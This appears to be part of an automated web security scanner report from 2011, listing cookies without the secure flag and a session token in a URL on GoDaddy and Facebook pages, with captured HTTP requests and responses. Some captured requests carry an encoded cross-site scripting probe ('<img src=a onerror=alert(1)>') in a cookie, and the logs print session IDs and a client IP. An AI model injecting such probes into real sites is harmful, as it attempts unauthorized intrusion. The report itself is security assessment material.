6.3. https://www.godaddy.com/domains/search.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

6.4. https://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.5. https://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.6. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

6.7. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

lsd=bnJmV; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.8. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.9. https://www.facebook.com/help/contact.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/help/contact.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

6.10. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.11. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

lsd=Mkkns; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

6.12. https://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

6.13. https://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/r.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.14. https://www.facebook.com/recover.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/recover.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=1304595854; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
W=1304595854; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.15. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

6.16. https://www.godaddy.com/gdshop/registrar/search.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close

6.17. https://www.godaddy.com/gdshop/website.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/website.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close

7. Session token in URL previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26re